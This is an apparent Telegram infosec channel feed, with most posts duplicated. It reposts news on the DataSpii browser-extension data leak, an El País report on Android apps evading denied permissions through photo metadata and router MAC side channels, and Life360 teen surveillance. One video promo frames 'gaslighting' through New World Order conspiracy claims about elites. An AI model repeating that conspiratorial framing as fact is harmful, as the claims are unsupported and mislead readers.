We observed two extensions employing dilatory tactics — an effective maneuver for eluding detection — to collect the data. We identified the collection of sensitive data from the internal network environments of Fortune 500 companies.
Several Fortune 500 companies provided an additional measure of confirmation through a process of responsible disclosure. By deploying a honeypot to monitor web traffic, we discovered near-immediate visits to URLs collected by the extensions. To address the evolving threat to data security, we propose preemptive measures such as limiting access to shareable links, and removing PII and CI from metadata.
👉🏼 https://securitywithsam.com/2019/07/dataspii-leak-via-browser-extensions/
I found your data. It’s for sale.
As many as 4 million people have Web browser extensions that sell their every click. And that’s just the tip of the iceberg.
I’ve watched you check in for a flight and seen your doctor refilling a prenoscription.
I’ve peeked inside corporate networks at reports on faulty rockets. If I wanted, I could’ve even opened a tax return you only shared with your accountant.
I found your data because it’s for sale online. Even more terrifying: It’s happening because of software you probably installed yourself.
My latest investigation into the secret life of our data is not a fire drill. Working with an independent security researcher, I found as many as 4 million people have been leaking personal and corporate secrets through Chrome and Firefox. Even a colleague in The Washington Post’s newsroom got caught up. When we told browser makers Google and Mozilla, they shut these leaks immediately — but we probably identified only a fraction of the problem
👉🏼 https://www.washingtonpost.com/technology/2019/07/18/i-found-your-data-its-sale/
#DataSpii #DataSpy #browser #extensions #data #leak #security #investigation #chrome #firefox
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
We present DataSpii (pronounced data-spy), the catastrophic data leak that occurs when any one of eight browser extensions collects browsing activity data — including personally identifiable information (PII) and corporate information (CI) — from unwitting Chrome and Firefox users.
Our investigation uncovered an online service selling the collected browsing activity data to its subnoscription members in near real-time. In this report, we delineate the sensitive data source types relevant to the security of individuals and businesses across the globe.
We observed two extensions employing dilatory tactics — an effective maneuver for eluding detection — to collect the data. We identified the collection of sensitive data from the internal network environments of Fortune 500 companies.
Several Fortune 500 companies provided an additional measure of confirmation through a process of responsible disclosure. By deploying a honeypot to monitor web traffic, we discovered near-immediate visits to URLs collected by the extensions. To address the evolving threat to data security, we propose preemptive measures such as limiting access to shareable links, and removing PII and CI from metadata.
👉🏼 https://securitywithsam.com/2019/07/dataspii-leak-via-browser-extensions/
I found your data. It’s for sale.
As many as 4 million people have Web browser extensions that sell their every click. And that’s just the tip of the iceberg.
I’ve watched you check in for a flight and seen your doctor refilling a prenoscription.
I’ve peeked inside corporate networks at reports on faulty rockets. If I wanted, I could’ve even opened a tax return you only shared with your accountant.
I found your data because it’s for sale online. Even more terrifying: It’s happening because of software you probably installed yourself.
My latest investigation into the secret life of our data is not a fire drill. Working with an independent security researcher, I found as many as 4 million people have been leaking personal and corporate secrets through Chrome and Firefox. Even a colleague in The Washington Post’s newsroom got caught up. When we told browser makers Google and Mozilla, they shut these leaks immediately — but we probably identified only a fraction of the problem
👉🏼 https://www.washingtonpost.com/technology/2019/07/18/i-found-your-data-its-sale/
#DataSpii #DataSpy #browser #extensions #data #leak #security #investigation #chrome #firefox
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
No solo FaceApp: miles de aplicaciones espían aunque se les niegue el permiso.
El caso de FaceApp, la aplicación que utiliza inteligencia artificial para envejecer un rostro y mostrar una imagen realista, ha puesto el punto de mira sobre un aspecto común en el que pocos usuarios reparan. Al instalarla, se advierte de que todos nuestros datos serán utilizados e incluso cedidos a terceros, por lo que se pierde el control. En este caso se avisa en un proceso que pocos usuarios leen o que aceptan sin pensar en las consecuencias. Pero algunos programas para móviles pueden no necesitar ni siquiera el consentimiento explícito. Miles de aplicaciones burlan las limitaciones y espían, aunque no se les autorice.
¿Para qué necesita la linterna del móvil acceder a la ubicación de un usuario? ¿Y una aplicación de retoque fotográfico al micrófono? ¿O una grabadora a los contactos? En principio, estas apps no precisan de este tipo de permisos para su funcionamiento. Cuando acceden a ellos, suele ser en búsqueda de un bien sumamente valioso: los datos. Los usuarios pueden dar o denegar diferentes permisos a las aplicaciones para que accedan a su ubicación, los contactos o los archivos almacenados en el teléfono. Pero una investigación de un equipo de expertos en ciberseguridad ha revelado que hasta 12.923 apps han encontrado la forma de seguir recopilando información privada pese a haberles negado los permisos explícitamente.
Este estudio pone de manifiesto la dificultad de los usuarios de salvaguardar su privacidad. Investigadores del Instituto Internacional de Ciencias Computacionales (ICSI) en Berkeley, IMDEA Networks Institute de Madrid, la Universidad de Calgary y AppCensus han analizado un total de 88.000 aplicaciones de la Play Store y han observado cómo miles de aplicaciones acceden a información como la ubicación o datos del terminal que el usuario les había denegado previamente.
Los expertos aún no han hecho pública la lista completa de apps que realizan estas prácticas. Pero según la investigación, se encuentran entre ellas la aplicación del parque de Disneyland en Hong Kong, el navegador de Samsung o el buscador chino Baidu. El número de usuarios potenciales afectados por estos hallazgos es de “cientos de millones”.
Borja Adsuara, abogado experto en derecho digital, asegura que se trata de “una infracción muy grave” porque el sistema operativo Android requiere que las apps pidan el acceso consentido a estos datos a través de permisos y el usuario les dice expresamente que no. El consentimiento, según explica, funciona de forma muy parecida tanto en la intimidad física como en la no física —datos personales—. “Es como en el caso de una violación en el que la víctima dice expresamente que no”, afirma.
Narseo Vallina-Rodríguez, coautor del estudio, señala que “no está claro si habrá parches o actualizaciones para los miles de millones de usuarios Android que a día de hoy utilizan versiones del sistema operativo con estas vulnerabilidades". Google no ha concretado a este periódico si tiene pensado retirar del mercado o tomar alguna medida en relación a las aplicaciones que, según el estudio, acceden a los datos de los usuarios sin el permiso pertinente. No obstante, ha asegurado que el problema se resolverá con Android Q, la próxima versión de su sistema operativo. La compañía pretende lanzar a lo largo del año seis versiones beta antes de dar a conocer la versión final durante el tercer trimestre del año.
¿Cómo acceden las aplicaciones a información privada del usuario sin los permisos necesarios? Las apps burlan los mecanismos de control del sistema operativo mediante los side channels y los covert channels. Vallina hace la siguiente comparación: “Para entrar en una casa [el dato del usuario] puedes hacerlo por la puerta con la llave que te ha dado el dueño [el permiso], pero también lo puedes hacer sin consentimiento del propietario aprovechándote de una vulnerabilidad de la puerta [un side channel] o con la ayuda de alguien que ya está dentro [covert channel]".
El caso de FaceApp, la aplicación que utiliza inteligencia artificial para envejecer un rostro y mostrar una imagen realista, ha puesto el punto de mira sobre un aspecto común en el que pocos usuarios reparan. Al instalarla, se advierte de que todos nuestros datos serán utilizados e incluso cedidos a terceros, por lo que se pierde el control. En este caso se avisa en un proceso que pocos usuarios leen o que aceptan sin pensar en las consecuencias. Pero algunos programas para móviles pueden no necesitar ni siquiera el consentimiento explícito. Miles de aplicaciones burlan las limitaciones y espían, aunque no se les autorice.
¿Para qué necesita la linterna del móvil acceder a la ubicación de un usuario? ¿Y una aplicación de retoque fotográfico al micrófono? ¿O una grabadora a los contactos? En principio, estas apps no precisan de este tipo de permisos para su funcionamiento. Cuando acceden a ellos, suele ser en búsqueda de un bien sumamente valioso: los datos. Los usuarios pueden dar o denegar diferentes permisos a las aplicaciones para que accedan a su ubicación, los contactos o los archivos almacenados en el teléfono. Pero una investigación de un equipo de expertos en ciberseguridad ha revelado que hasta 12.923 apps han encontrado la forma de seguir recopilando información privada pese a haberles negado los permisos explícitamente.
Este estudio pone de manifiesto la dificultad de los usuarios de salvaguardar su privacidad. Investigadores del Instituto Internacional de Ciencias Computacionales (ICSI) en Berkeley, IMDEA Networks Institute de Madrid, la Universidad de Calgary y AppCensus han analizado un total de 88.000 aplicaciones de la Play Store y han observado cómo miles de aplicaciones acceden a información como la ubicación o datos del terminal que el usuario les había denegado previamente.
Los expertos aún no han hecho pública la lista completa de apps que realizan estas prácticas. Pero según la investigación, se encuentran entre ellas la aplicación del parque de Disneyland en Hong Kong, el navegador de Samsung o el buscador chino Baidu. El número de usuarios potenciales afectados por estos hallazgos es de “cientos de millones”.
Borja Adsuara, abogado experto en derecho digital, asegura que se trata de “una infracción muy grave” porque el sistema operativo Android requiere que las apps pidan el acceso consentido a estos datos a través de permisos y el usuario les dice expresamente que no. El consentimiento, según explica, funciona de forma muy parecida tanto en la intimidad física como en la no física —datos personales—. “Es como en el caso de una violación en el que la víctima dice expresamente que no”, afirma.
Narseo Vallina-Rodríguez, coautor del estudio, señala que “no está claro si habrá parches o actualizaciones para los miles de millones de usuarios Android que a día de hoy utilizan versiones del sistema operativo con estas vulnerabilidades". Google no ha concretado a este periódico si tiene pensado retirar del mercado o tomar alguna medida en relación a las aplicaciones que, según el estudio, acceden a los datos de los usuarios sin el permiso pertinente. No obstante, ha asegurado que el problema se resolverá con Android Q, la próxima versión de su sistema operativo. La compañía pretende lanzar a lo largo del año seis versiones beta antes de dar a conocer la versión final durante el tercer trimestre del año.
¿Cómo acceden las aplicaciones a información privada del usuario sin los permisos necesarios? Las apps burlan los mecanismos de control del sistema operativo mediante los side channels y los covert channels. Vallina hace la siguiente comparación: “Para entrar en una casa [el dato del usuario] puedes hacerlo por la puerta con la llave que te ha dado el dueño [el permiso], pero también lo puedes hacer sin consentimiento del propietario aprovechándote de una vulnerabilidad de la puerta [un side channel] o con la ayuda de alguien que ya está dentro [covert channel]".
Puedes abrir una puerta con una llave, pero también puedes encontrar la forma de hacerlo sin tener esa llave”. Lo mismo ocurre al intentar acceder a la geolocalización de un terminal. Puedes no tener acceso al GPS, pero hallar el modo de acceder a la información del posicionamiento del usuario.
Metadatos
Una forma de hacerlo es a través de los metadatos que están integrados en las fotografías sacadas por el propietario del smartphone, según Vallina. "Por defecto, cada fotografía que saca un usuario Android contiene metadatos como la posición y la hora en la que se han tomado. Varias apps acceden a la posición histórica del usuario pidiendo el permiso para leer la tarjeta de memoria, porque ahí es donde están almacenadas las fotografías, sin tener que pedir acceso al GPS”, afirma. Es el caso de Shutterfly, una aplicación de edición de fotografía. Los investigadores han comprobado que recababa información de coordenadas de GPS a partir de las imágenes de los usuarios pese a que le hubieran denegado el permiso para acceder a su ubicación.
También es posible acceder a la geolocalización a través del punto de acceso wifi con la dirección MAC del router, un identificador asignado por el fabricante que se puede correlacionar con bases de datos existentes para averiguar la posición del usuario “con una resolución bastante precisa”.
Para que la aplicación pueda acceder a esta información, existe un permiso que el usuario debe activar en su smartphone llamado “información de la conexión wifi”, según explica Vallina. Pero hay apps que consiguen obtener estos datos sin que el permiso esté activado. Para hacerlo, extraen la dirección MAC del router que el terminal obtiene mediante el protocolo ARP (Address Resolution Protocol), que se usa para conectar y descubrir los dispositivos que están en una red local. Es decir, las aplicaciones pueden acceder a un fichero que expone la información MAC del punto de acceso wifi: “Si lees ese fichero que el sistema operativo expone sin ningún tipo de permiso, puedes saber la geolocalización de forma totalmente opaca para el usuario”.
Librerías de terceros
Muchas de estas filtraciones de datos o abusos a la privacidad del usuario se realizan por librerías, que son servicios o miniprogramas de terceros incluidos en el código de las aplicaciones. Estas librerías se ejecutan con los mismos privilegios que la app en la que se encuentran. En muchas ocasiones, el usuario no es consciente de que existen. “Muchos de esos servicios tienen un modelo de negocio que está basado en la obtención y el procesado de los datos personales”, afirma el investigador.
Por ejemplo, aplicaciones como la del parque de Disneyland de Hong Kong utilizan el servicio de mapas de la compañía china Baidu. De esta forma, pueden acceder sin necesidad de tener ningún permiso a información como el IMEI y otros identificadores que las librerías del buscador chino almacenan en la tarjeta SD. Las aplicaciones de salud y navegación de Samsung, que están instaladas en más de 500 millones de dispositivos, también han utilizado este tipo de librerías para su funcionamiento. “La propia librería explota esas vulnerabilidades para acceder a esos datos para sus propios fines. No está claro si luego el desarrollador de la app accede a esos datos a través de la librería”, explica.
Vallina afirma que en las próximas investigaciones analizarán el ecosistema de las librerías de terceros y para qué fines se obtienen los datos. También estudiarán los modelos de monetización que existen en Android y la transparencia de las aplicaciones en cuanto a lo que hacen y lo que dicen hacer en las políticas de privacidad. Para evitar este tipo de prácticas, el también coautor del estudio Joel Reardon señala la importancia de realizar investigaciones de este tipo con el objetivo de “encontrar estos errores y prevenirlos”.
Metadatos
Una forma de hacerlo es a través de los metadatos que están integrados en las fotografías sacadas por el propietario del smartphone, según Vallina. "Por defecto, cada fotografía que saca un usuario Android contiene metadatos como la posición y la hora en la que se han tomado. Varias apps acceden a la posición histórica del usuario pidiendo el permiso para leer la tarjeta de memoria, porque ahí es donde están almacenadas las fotografías, sin tener que pedir acceso al GPS”, afirma. Es el caso de Shutterfly, una aplicación de edición de fotografía. Los investigadores han comprobado que recababa información de coordenadas de GPS a partir de las imágenes de los usuarios pese a que le hubieran denegado el permiso para acceder a su ubicación.
También es posible acceder a la geolocalización a través del punto de acceso wifi con la dirección MAC del router, un identificador asignado por el fabricante que se puede correlacionar con bases de datos existentes para averiguar la posición del usuario “con una resolución bastante precisa”.
Para que la aplicación pueda acceder a esta información, existe un permiso que el usuario debe activar en su smartphone llamado “información de la conexión wifi”, según explica Vallina. Pero hay apps que consiguen obtener estos datos sin que el permiso esté activado. Para hacerlo, extraen la dirección MAC del router que el terminal obtiene mediante el protocolo ARP (Address Resolution Protocol), que se usa para conectar y descubrir los dispositivos que están en una red local. Es decir, las aplicaciones pueden acceder a un fichero que expone la información MAC del punto de acceso wifi: “Si lees ese fichero que el sistema operativo expone sin ningún tipo de permiso, puedes saber la geolocalización de forma totalmente opaca para el usuario”.
Librerías de terceros
Muchas de estas filtraciones de datos o abusos a la privacidad del usuario se realizan por librerías, que son servicios o miniprogramas de terceros incluidos en el código de las aplicaciones. Estas librerías se ejecutan con los mismos privilegios que la app en la que se encuentran. En muchas ocasiones, el usuario no es consciente de que existen. “Muchos de esos servicios tienen un modelo de negocio que está basado en la obtención y el procesado de los datos personales”, afirma el investigador.
Por ejemplo, aplicaciones como la del parque de Disneyland de Hong Kong utilizan el servicio de mapas de la compañía china Baidu. De esta forma, pueden acceder sin necesidad de tener ningún permiso a información como el IMEI y otros identificadores que las librerías del buscador chino almacenan en la tarjeta SD. Las aplicaciones de salud y navegación de Samsung, que están instaladas en más de 500 millones de dispositivos, también han utilizado este tipo de librerías para su funcionamiento. “La propia librería explota esas vulnerabilidades para acceder a esos datos para sus propios fines. No está claro si luego el desarrollador de la app accede a esos datos a través de la librería”, explica.
Vallina afirma que en las próximas investigaciones analizarán el ecosistema de las librerías de terceros y para qué fines se obtienen los datos. También estudiarán los modelos de monetización que existen en Android y la transparencia de las aplicaciones en cuanto a lo que hacen y lo que dicen hacer en las políticas de privacidad. Para evitar este tipo de prácticas, el también coautor del estudio Joel Reardon señala la importancia de realizar investigaciones de este tipo con el objetivo de “encontrar estos errores y prevenirlos”.
❤1
Si los desarrolladores de aplicaciones pueden eludir los permisos, ¿tiene sentido pedir permiso a los usuarios? “Sí”, responde tajante Reardon. El investigador hace hincapié en que las aplicaciones no pueden burlar todos los mecanismos de control y que poco a poco lo tendrán más difícil. “El sistema de permisos tiene muchos fallos, pero aún así sirve y persigue un propósito importante”, afirma.
Responsabilidad de los desarrolladores
Estas prácticas realizadas sin el consentimiento de los usuarios incumplen, entre otras normativas, el Reglamento General de Protección de Datos (RGPD) y la Ley Orgánica de Protección de Datos. Los desarrolladores de estas aplicaciones podrían enfrentarse, según el RGPD, a sanciones económicas de hasta 20 millones de euros o el 4% de la facturación anual de la empresa. E incluso podrían constituir un delito contra la intimidad (artículo 197 del Código Penal) que podría conllevar penas de prisión, según Adsuara.
El abogado sostiene que la mayor parte de la responsabilidad recae en los desarrolladores. Pero considera que tanto las tiendas —Google Play y Apple Store— como las plataformas que dan acceso a las aplicaciones a los datos de sus usuarios —como Facebook en el caso Cambridge Analytica— tienen una responsabilidad in vigilando: “Es decir, el deber de vigilar que las aplicaciones que aceptan en su tienda o a las que dan acceso a los datos de sus usuarios en su plataforma sean seguras”.
“Aunque cada uno es responsable de sus actos, se echa en falta alguna autoridad española o europea que revise la seguridad de las aplicaciones y servicios TIC antes de lanzarlas al mercado”, afirma. Y subraya que en otros sectores sí existe algún tipo de certificación que garantiza que un producto o servicio es seguro: “A nadie se le ocurre, por ejemplo, que se autorice la circulación de coches a los que les fallan los frenos. Y ya no digamos medicinas, alimentos o juguetes. Sin embargo, es normal en el sector TIC que se lancen al mercado aplicaciones y servicios con agujeros de seguridad, que luego, sobre la marcha, se van parcheando”.
https://elpais.com/tecnologia/2019/07/18/actualidad/1563452146_195128.html
#faceapp #privacidad
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Responsabilidad de los desarrolladores
Estas prácticas realizadas sin el consentimiento de los usuarios incumplen, entre otras normativas, el Reglamento General de Protección de Datos (RGPD) y la Ley Orgánica de Protección de Datos. Los desarrolladores de estas aplicaciones podrían enfrentarse, según el RGPD, a sanciones económicas de hasta 20 millones de euros o el 4% de la facturación anual de la empresa. E incluso podrían constituir un delito contra la intimidad (artículo 197 del Código Penal) que podría conllevar penas de prisión, según Adsuara.
El abogado sostiene que la mayor parte de la responsabilidad recae en los desarrolladores. Pero considera que tanto las tiendas —Google Play y Apple Store— como las plataformas que dan acceso a las aplicaciones a los datos de sus usuarios —como Facebook en el caso Cambridge Analytica— tienen una responsabilidad in vigilando: “Es decir, el deber de vigilar que las aplicaciones que aceptan en su tienda o a las que dan acceso a los datos de sus usuarios en su plataforma sean seguras”.
“Aunque cada uno es responsable de sus actos, se echa en falta alguna autoridad española o europea que revise la seguridad de las aplicaciones y servicios TIC antes de lanzarlas al mercado”, afirma. Y subraya que en otros sectores sí existe algún tipo de certificación que garantiza que un producto o servicio es seguro: “A nadie se le ocurre, por ejemplo, que se autorice la circulación de coches a los que les fallan los frenos. Y ya no digamos medicinas, alimentos o juguetes. Sin embargo, es normal en el sector TIC que se lancen al mercado aplicaciones y servicios con agujeros de seguridad, que luego, sobre la marcha, se van parcheando”.
https://elpais.com/tecnologia/2019/07/18/actualidad/1563452146_195128.html
#faceapp #privacidad
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
El País
No solo FaceApp: miles de aplicaciones espían aunque se les niegue el permiso
Casi 13.000 ‘apps’ burlan los permisos de Android para recopilar datos de los usuarios
Media is too big
VIEW IN TELEGRAM
Gaslight – Film, Literature and the New World Order
In this edition of Film, Literature and the #NewWorldOrder we welcome Thomas Sheridan, author of The Anvil of the Psyche, to discuss Gaslight, the 1940 British psychological thriller that introduced us to the concept of ‘gaslighting.’ In the discussion we point out how common #gaslighting is, ask “Are you being gaslighted?”, talk about techniques for defending oneself from gaslighting, and talk about how this technique is used on a societal level by the# psychopaths at the top of the pyramid.
📺 https://www.corbettreport.com/gaslight-film-literature-and-the-new-world-order/
#corbettreport #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
In this edition of Film, Literature and the #NewWorldOrder we welcome Thomas Sheridan, author of The Anvil of the Psyche, to discuss Gaslight, the 1940 British psychological thriller that introduced us to the concept of ‘gaslighting.’ In the discussion we point out how common #gaslighting is, ask “Are you being gaslighted?”, talk about techniques for defending oneself from gaslighting, and talk about how this technique is used on a societal level by the# psychopaths at the top of the pyramid.
📺 https://www.corbettreport.com/gaslight-film-literature-and-the-new-world-order/
#corbettreport #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
On TikTok, Teens Meme the Safety App Ruining Their Summer
Spend enough time on the social media app TikTok, and you’re bound to see a Life360 meme. That’s because Life360, a location-sharing app aimed at families, is apparently ruining the lives of teenagers all across the United States. The service allows parents to track their kids’ whereabouts in real time, among other features. As one girl with long, blond hair jokes in a popular TikTok clip, it’s set her summer vacation on fire. Some of the videos have racked up hundreds of thousands of likes—in other words, they’re relatable.
That’s because for many adolescents, adult supervision has turned into adult surveillance. Schools are adopting facial recognition technology to monitor campuses. Parents can now remotely check their child’s browsing histories and social media accounts, watch their movements via motion-sensing cameras, and track everywhere they go with location-sharing apps. In a Pew Research Center study last year, 58 percent of US parents said they sometimes or often look at their teenager’s messages, call logs, and the websites they visit. In a separate study from 2016, 16 percent said they used location-sharing apps.
Life360 is one of the many digital monitoring tools now used by millions of parents in the United States. The app functions like an enhanced version of Apple’s “Find My” feature that lets you share your location with friends or family—or what the company calls “your Circle.” In addition to location sharing, Life360 lets family members see how fast people in their circle are driving, how much battery their cell phones have, and more. The service is free to download and use, although you can pay for additional features. According to the San Francisco-based company, Life360 had over 18 million monthly active users at the end of 2018.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/on-tiktok-teens-meme-the-safety-app-ruining-their-summer
#Life360 #surveillance #teens #USA
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Spend enough time on the social media app TikTok, and you’re bound to see a Life360 meme. That’s because Life360, a location-sharing app aimed at families, is apparently ruining the lives of teenagers all across the United States. The service allows parents to track their kids’ whereabouts in real time, among other features. As one girl with long, blond hair jokes in a popular TikTok clip, it’s set her summer vacation on fire. Some of the videos have racked up hundreds of thousands of likes—in other words, they’re relatable.
That’s because for many adolescents, adult supervision has turned into adult surveillance. Schools are adopting facial recognition technology to monitor campuses. Parents can now remotely check their child’s browsing histories and social media accounts, watch their movements via motion-sensing cameras, and track everywhere they go with location-sharing apps. In a Pew Research Center study last year, 58 percent of US parents said they sometimes or often look at their teenager’s messages, call logs, and the websites they visit. In a separate study from 2016, 16 percent said they used location-sharing apps.
Life360 is one of the many digital monitoring tools now used by millions of parents in the United States. The app functions like an enhanced version of Apple’s “Find My” feature that lets you share your location with friends or family—or what the company calls “your Circle.” In addition to location sharing, Life360 lets family members see how fast people in their circle are driving, how much battery their cell phones have, and more. The service is free to download and use, although you can pay for additional features. According to the San Francisco-based company, Life360 had over 18 million monthly active users at the end of 2018.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/on-tiktok-teens-meme-the-safety-app-ruining-their-summer
#Life360 #surveillance #teens #USA
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN